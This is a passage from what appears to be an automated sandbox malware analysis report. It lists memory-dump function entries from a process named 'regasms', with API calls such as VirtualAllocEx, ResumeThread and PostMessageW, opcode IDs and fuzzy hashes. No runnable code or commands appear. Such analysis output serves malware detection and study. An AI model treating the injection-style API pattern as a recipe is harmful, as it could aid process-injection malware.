                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: aff30dc9824dca30f09af736a7ac6ecfacbf18f7b79e7f32b4e1b21149e0d8b4
                                  • Instruction ID: 1660f8e0d296411ca4a233c43586895b839605081d1dce2ec417aa6023830494
                                  • Opcode Fuzzy Hash: aff30dc9824dca30f09af736a7ac6ecfacbf18f7b79e7f32b4e1b21149e0d8b4
                                  • Instruction Fuzzy Hash: EE21B3B5D00248DFDB10CFAAD984ADEFBF4EB48310F14845AE918A7350D379A944CF65
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DD5A0E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 115084db0ec3f07ef12525dc25c13a77a5d100360e38f53652e4b2a8ff4c2131
                                  • Instruction ID: 8e81c879cd65a0d723b978a555cb81a55c08cb74f1cff9e5b2b5a72053f001d3
                                  • Opcode Fuzzy Hash: 115084db0ec3f07ef12525dc25c13a77a5d100360e38f53652e4b2a8ff4c2131
                                  • Instruction Fuzzy Hash: B72167728003499FDB20CFAAD840BDEFBF5EF48320F14881AE915A7640CB75A940CBA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: be24c081f695daf960539f334d4ac2e45fa258a8383011dffd1dfa3ca3d72a36
                                  • Instruction ID: ba9d1843e3decf85a4723345de73e61e26a36f6a9400c341ba206d1c10671992
                                  • Opcode Fuzzy Hash: be24c081f695daf960539f334d4ac2e45fa258a8383011dffd1dfa3ca3d72a36
                                  • Instruction Fuzzy Hash: 591153B18003498FDB24CFAAC4447EEFBF4EF88320F24841AD419A7640CB39A9408B95
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DD5A0E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: d40ea28ec8ddb06566f7b4e6baaf70a50a5c3632304b0185299475102fdea61a
                                  • Instruction ID: b0937065dd3af4d5eca68d935c64b029ba2e79fe27d2171f86dd7b0c1ffe7e1a
                                  • Opcode Fuzzy Hash: d40ea28ec8ddb06566f7b4e6baaf70a50a5c3632304b0185299475102fdea61a
                                  • Instruction Fuzzy Hash: FE1156728003499FDB20CFAAC844BDEFBF5EF48310F10881AE515A7250CB75A940CBA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: b42f92a299c811d52aaedc4a74d71110f0c8f8c65e024f29c92bfca6153bec95
                                  • Instruction ID: d6330d5199793b4d72e2f4d0152ab781af79a305b2eb42c1677545d276f27802
                                  • Opcode Fuzzy Hash: b42f92a299c811d52aaedc4a74d71110f0c8f8c65e024f29c92bfca6153bec95
                                  • Instruction Fuzzy Hash: 071125B1D003498FDB24DFAAD4447EEFBF4EB88320F24841AD519A7640CA79A945CBA5
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02F8B566
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: feef6ca4bbb9e7adddb6e96196b08586df99817b494390a7438f2ce3cf0acb6e
                                  • Instruction ID: 7e46416da90a7738f084faa775fd9bf22bb9b1b7a3f9e0216c1d8d51eb99b680
                                  • Opcode Fuzzy Hash: feef6ca4bbb9e7adddb6e96196b08586df99817b494390a7438f2ce3cf0acb6e
                                  • Instruction Fuzzy Hash: BD110FB6C002498FDB20DF9AC444ADEFBF4EB88314F10841AD519AB710C379A545CFA5
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07DD937D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 72f73e2c9d0cf5d3bc669e2e307d2db5c4fcaab43f5d147f4fa5d44292a3859f
                                  • Instruction ID: fb78466288bf61f0e244f7cd3bc868fee9819f356f7c13471c9f549c7d586d96
                                  • Opcode Fuzzy Hash: 72f73e2c9d0cf5d3bc669e2e307d2db5c4fcaab43f5d147f4fa5d44292a3859f
                                  • Instruction Fuzzy Hash: 4011F5B5800349DFDB10DF9AD845BDEFBF8EB48310F20841AE558A7640C375A944CFA1
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07DD937D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 30d0038dbd0d9b3705596e59725e3bc7b0cfc14e4b7e793e0caf84e6c464a47c
                                  • Instruction ID: 63b3fd39a69953f87b60a0ff281b6b94b4291d76dfa4e97c8af6610141e96e00
                                  • Opcode Fuzzy Hash: 30d0038dbd0d9b3705596e59725e3bc7b0cfc14e4b7e793e0caf84e6c464a47c
                                  • Instruction Fuzzy Hash: 4301C2B48007499FDB10DF9AC589B9EBBF8EB09310F108419E559A7750C3B9A984CFA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q
                                  • API String ID: 0-2414175341
                                  • Opcode ID: 6f9bc62dc3a218d5c0a387a7df58537b07cf54ae8a687e696221bca5af8bd537
                                  • Instruction ID: adca1e01e5a0da3f89715decfb1df1817bae9491db6f4d7e7cd531a907f660f7
                                  • Opcode Fuzzy Hash: 6f9bc62dc3a218d5c0a387a7df58537b07cf54ae8a687e696221bca5af8bd537
                                  • Instruction Fuzzy Hash: E261D4B1B002069FEB259F65D854BAFBBE6FF88240F54846AE90697390DB349D41CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0,Gq
                                  • API String ID: 0-2013397073
                                  • Opcode ID: 0cacfcdfc7b562e62dac1d4f1d2caf859968d36f0723504749e43ad17b3fe2fa
                                  • Instruction ID: 5817e6cc72b29e4e25fdbcdf302fa5dea917b89c5195ede8795643e262155a4d
                                  • Opcode Fuzzy Hash: 0cacfcdfc7b562e62dac1d4f1d2caf859968d36f0723504749e43ad17b3fe2fa
                                  • Instruction Fuzzy Hash: 9C71E434B042449FE710AB78D455A9EBBB2FF89300F0585EAD8859F396CB706D46C7D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Teq
                                  • API String ID: 0-1098410595
                                  • Opcode ID: 666050f5c5665f1d2407afab971df17a29bf48dbf60b2c189d3f4afaa08fe1b7
                                  • Instruction ID: 73cbe2f10e0af86ddd996273966de6aada79f053a0c340d3b1c63d6212359c01
                                  • Opcode Fuzzy Hash: 666050f5c5665f1d2407afab971df17a29bf48dbf60b2c189d3f4afaa08fe1b7
                                  • Instruction Fuzzy Hash: 7171F4B4E14209CFEB44CFA9C884AEEBBB6FF89301F54806AD919AB354D7309945CF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0,Gq
                                  • API String ID: 0-2013397073
                                  • Opcode ID: 69077779ba14f49fe3c86b537692e167263ba7aa5de73ab2602c3fe99db3d427
                                  • Instruction ID: 1f92ed99f4ec28c8331196e6accd26037d5bb5dce450d6182cef4c4d7007f1c4
                                  • Opcode Fuzzy Hash: 69077779ba14f49fe3c86b537692e167263ba7aa5de73ab2602c3fe99db3d427
                                  • Instruction Fuzzy Hash: 80619234F002059FE714AB68D455AAEB7B2FF88300F5485A9D9859F386CF706E46C7D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h
                                  • API String ID: 0-2439710439
                                  • Opcode ID: bbc51ba2306c66a266beffca0c94efb14889f9c3cecf79de074a72f875402c59
                                  • Instruction ID: 463e1d13172a6e8a957e85edb61ac1deef10326d9381a826758ad2801e6a655d
                                  • Opcode Fuzzy Hash: bbc51ba2306c66a266beffca0c94efb14889f9c3cecf79de074a72f875402c59
                                  • Instruction Fuzzy Hash: 144161B0A0060ACFDF10EFA4C8805ADF7B1FF89310B548699E816E7355EB34E985CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: c95306b04c63a7136c9844633ac0679570a4e99e80c9d9703897d68a36440fa4
                                  • Instruction ID: db186e41208937f0e3a1f6fed5f8ee38e3be106a262df7e8fca6cf57b0244ee8
                                  • Opcode Fuzzy Hash: c95306b04c63a7136c9844633ac0679570a4e99e80c9d9703897d68a36440fa4
                                  • Instruction Fuzzy Hash: 6011E1F291C281EFE321966494102767BA6BB47134F98C8EBD446CB182C33E884287A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: 393177cc2c8294315b77fa7797d1a7ec94b67db2a43cec3846aaa6d7260581e0
                                  • Instruction ID: 8fe583bc1ddaf2c90457320cd4bcd2b23e48f442126d2fe40f727b3d57d5a096
                                  • Opcode Fuzzy Hash: 393177cc2c8294315b77fa7797d1a7ec94b67db2a43cec3846aaa6d7260581e0
                                  • Instruction Fuzzy Hash: 0D0181F0519642DFE3218B14E914764BBA6F707264FC883E6E84ACB242C7758984C7EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: G
                                  • API String ID: 0-985283518
                                  • Opcode ID: 8e232823a0192a2732082e9961aedad38d0e3e9ae0af8fb4465c858a41fdeaa4
                                  • Instruction ID: 116a284d974af9db39c8701fdbee8c296c5da5334799f8dc24c17f7014c56d71
                                  • Opcode Fuzzy Hash: 8e232823a0192a2732082e9961aedad38d0e3e9ae0af8fb4465c858a41fdeaa4
                                  • Instruction Fuzzy Hash: 70D05EF090D288EBD715CE91D9501A87BBA9B13219F8510C3D4098B642DF260F299793
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: G
                                  • API String ID: 0-985283518
                                  • Opcode ID: 22112509263fd768a65e91410fedb28d25b106c1676d023da72a9d999611b15a
                                  • Instruction ID: 16938894937e57310908f046359a6edec2f96d463266c1fedccccd55462d8b29
                                  • Opcode Fuzzy Hash: 22112509263fd768a65e91410fedb28d25b106c1676d023da72a9d999611b15a
                                  • Instruction Fuzzy Hash: B3C08CF050810CEBD704CF90D90563CB7BDD702309F8000C4D90E43600DF311F20AA82
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04360da8d7328a823a82a72f928a01ef49b360665accf295c2ec8174aae4d3b8
                                  • Instruction ID: ab12d978ca13cd971afb2a302daf2db2622cf684917e5baf79e776ffb2216ff8
                                  • Opcode Fuzzy Hash: 04360da8d7328a823a82a72f928a01ef49b360665accf295c2ec8174aae4d3b8
                                  • Instruction Fuzzy Hash: 6ED1BFF0F0120ADFEB15AF68C4486AEBFF1EF46200F9544E9D446A7295FA31C865CB91
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6fcae213b08c44036a406d7f6df4482735f846aaacdfda6ab893e9541b87ca65
                                  • Instruction ID: 3bc331714f5b074abbab79df43eb163230f3f013339e24c6360f8092b6505bda
                                  • Opcode Fuzzy Hash: 6fcae213b08c44036a406d7f6df4482735f846aaacdfda6ab893e9541b87ca65
                                  • Instruction Fuzzy Hash: 39F1C971D1061ACBDF10EFA8C894AEDB7B5FF49300F1086A9D549B7254EB70AA85CF90
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54aa678cd424f07bc2c63ad48984f507d10d53581548ab65044a575e8df2fea2
                                  • Instruction ID: 33ef6c5453851d7c02b73476a5b928074e5a423318c86456dc7abc184e454d40
                                  • Opcode Fuzzy Hash: 54aa678cd424f07bc2c63ad48984f507d10d53581548ab65044a575e8df2fea2
                                  • Instruction Fuzzy Hash: B7E1D871D1061ACBDF10EFA8C9946EDB7B5FF48300F1086AAD549B7254EB70AA85CF90
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb53937f0bd743cfe0da88f6076b90fb80609da8e702393e58cd32ae1b10cb09
                                  • Instruction ID: b8098cef9426678af93d23c0b3f004471c429199e65ff0328b2b1603a0501dac
                                  • Opcode Fuzzy Hash: bb53937f0bd743cfe0da88f6076b90fb80609da8e702393e58cd32ae1b10cb09
                                  • Instruction Fuzzy Hash: 8BA1D775910619DFDB10EF68C840A9DFBB1FF4A304F05C699E549BB215EB30AA89CF90
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 91e9a565aca6214fb49800772dac59a9bf8acd119c8cf44324af98bec08df088
                                  • Instruction ID: 2581f8f345e48f874fba9c2613ebcb97b7365849ff18b80dc27ae4238f70de8d
                                  • Opcode Fuzzy Hash: 91e9a565aca6214fb49800772dac59a9bf8acd119c8cf44324af98bec08df088
                                  • Instruction Fuzzy Hash: 94F059D282D380EFE3128BA898210723FB7F85B020BC049CBE047CF552E125440483A3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef1713edce6c380efe6ff4d01236d2138641af38a7956533f477ab39df41a893
                                  • Instruction ID: 4ce9915f5457cf8f484b7eac70632e99d8325278c4ee6839a15d1264a6b17398
                                  • Opcode Fuzzy Hash: ef1713edce6c380efe6ff4d01236d2138641af38a7956533f477ab39df41a893
                                  • Instruction Fuzzy Hash: F80146B691460C9FDB00EFA8D844589BBB0FF56215F01C1ABE858DB121EB30C698CBA1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 829f101a5d46794d42e80a569f92ca0aecd667041e1cf48dcae596fb36844ec9
                                  • Instruction ID: f36e9a1b753328382602e2bdf647e5edec315ed33e5cf0dde67724f2d9a61bab
                                  • Opcode Fuzzy Hash: 829f101a5d46794d42e80a569f92ca0aecd667041e1cf48dcae596fb36844ec9
                                  • Instruction Fuzzy Hash: ABF0123570021AAF9B155F55E8448AFBFA6FB8D610710802AFE15C3350DB718C259B90
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 99f79787fcaec2a45717f61d0e80742b2e23dc4bcf98afa86bec7cbf21eaf25f
                                  • Instruction ID: e1ef84436565cad81ce6633d7a2c55e9cabaad8842638622f0d96d23e9fa9a1d
                                  • Opcode Fuzzy Hash: 99f79787fcaec2a45717f61d0e80742b2e23dc4bcf98afa86bec7cbf21eaf25f
                                  • Instruction Fuzzy Hash: 5CF0E231305700ABD7254B24A848D977F3AEFCA750B45C06AF5098B291DA308C02CBF0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad363086a75d4ac40d1df44ee30b5af716ed3b707230b5b5d3f43a17dcd7fe8a
                                  • Instruction ID: 2b95b1740d9b57a92c20af580777d48f7bfc6b4aa782dfde1efc8bd26501d68e
                                  • Opcode Fuzzy Hash: ad363086a75d4ac40d1df44ee30b5af716ed3b707230b5b5d3f43a17dcd7fe8a
                                  • Instruction Fuzzy Hash: 8EF0E9B2604144BFDF15CF64EC5199E7FB6DF45160B0480EBE004CB261E6319D90C791
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e02a31c4ebdf75bd9d8c9b0acc2ea742efd2e46ce38ef96299d6552492a9b6ae
                                  • Instruction ID: 13cc1f215d8a612df0d5e2ab025915684302b6a2bfac426bdfed39e6750562f2
                                  • Opcode Fuzzy Hash: e02a31c4ebdf75bd9d8c9b0acc2ea742efd2e46ce38ef96299d6552492a9b6ae
                                  • Instruction Fuzzy Hash: 07F082367002009BD3249F69F408E967BA6EBC9761F10C03AF649CB240DA31C806DBA0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c33c4f73ec31fa1407455ce34a8655c754c7e9c2d1b8759e4181d96a8f9b4956
                                  • Instruction ID: 781c9d446bc0a46bb228cbcca82139bdd61f0c49f1fe4ffde996019555bf633b
                                  • Opcode Fuzzy Hash: c33c4f73ec31fa1407455ce34a8655c754c7e9c2d1b8759e4181d96a8f9b4956
                                  • Instruction Fuzzy Hash: 5DE0D1E192D28CDBBB21D6646C5217B3BBC97470A1FC406C7E80E87601D512095243F3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03a5164cf8e24f85f365f5c7d825487e9ff4fbee48ceb6297dc1a8ecb2d97420
                                  • Instruction ID: ee939662539b91afdf32cc0b67a988f64f0ab9a4a2ee07c5160f71086c8c4769
                                  • Opcode Fuzzy Hash: 03a5164cf8e24f85f365f5c7d825487e9ff4fbee48ceb6297dc1a8ecb2d97420
                                  • Instruction Fuzzy Hash: 1EF0B4B0A55345DFEF019BB4CC4E9AEBB72AF57300F41C292E612AB2D1C7305815DB51
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: babc2a4b20839f0f86826ac636cbf731b1da35564bc20f7917ef232bc597e739
                                  • Instruction ID: 20b7a80b1959d26ccfdbe0260e0f90d9279c896c95593869bcf95d1ff107cdbb
                                  • Opcode Fuzzy Hash: babc2a4b20839f0f86826ac636cbf731b1da35564bc20f7917ef232bc597e739
                                  • Instruction Fuzzy Hash: DBF089A161A3C28FE7135F78CC606A67FB1AF43104F5885DBC1D197293C6155C49C752
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4823469f8396553cc1a69982fefd8a7a1e37cc712adba19791688c525e9e3c97
                                  • Instruction ID: 1bbeda5ede872b56a82334d58be146dfee2e2f51e79ae3399e5c6d9630da3a9d
                                  • Opcode Fuzzy Hash: 4823469f8396553cc1a69982fefd8a7a1e37cc712adba19791688c525e9e3c97
                                  • Instruction Fuzzy Hash: 39F0A0F04991489EE350457495006757B67E78330EFA4C1E9D0594F182CA3F8883C662
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4182fa226c95a1ee8527170cbfe9b103882492693abdb12d160b6570f2bb6b6f
                                  • Instruction ID: 9ae92491b2b8cde0960e418844b2f5b5ed5b812cf84e119e74e84653ca089d1e
                                  • Opcode Fuzzy Hash: 4182fa226c95a1ee8527170cbfe9b103882492693abdb12d160b6570f2bb6b6f
                                  • Instruction Fuzzy Hash: 9EE0D8B09EC608DBE334CF64D81B7617F99FB4A301F80C1E6D507DA540C731484146A2
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a9d7731934635cd5249510805627d9bd4820485f72dbc1bc3845466f64a2898
                                  • Instruction ID: c3f0b6ecbf6717992e1ab08d00c50ed7735bb402d519926b8e3ace17bb0d9aa9
                                  • Opcode Fuzzy Hash: 6a9d7731934635cd5249510805627d9bd4820485f72dbc1bc3845466f64a2898
                                  • Instruction Fuzzy Hash: F1E0D86052C1C4CBF61CB564843D735B3567743201FD080F3800B5B585D92278044582
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d7c146e5f9e178b0717a55537bb8731d4bca66532733cc68b92548178d43c5
                                  • Instruction ID: 539b4ea3edcf482b62d3214a34259bd033be5b50cc4929363c964cebce8a1172
                                  • Opcode Fuzzy Hash: a3d7c146e5f9e178b0717a55537bb8731d4bca66532733cc68b92548178d43c5
                                  • Instruction Fuzzy Hash: F9D05ED55AD389EFF61196B4582C6BA3F6FD98B204F9544CBE10F8A142D912980503B3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45d93f9e68da8270c5eea0956a1fad0303d1965a53dbecab2a3cee869321f57e
                                  • Instruction ID: 307fbf6644775e02ab44234a5089a61676c045a98c92c580a06b8da4217535ba
                                  • Opcode Fuzzy Hash: 45d93f9e68da8270c5eea0956a1fad0303d1965a53dbecab2a3cee869321f57e
                                  • Instruction Fuzzy Hash: A5E092B41096428FE312DB64C8196267BB1FF47214F04C8CA84568B292CA30AC0AC795
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
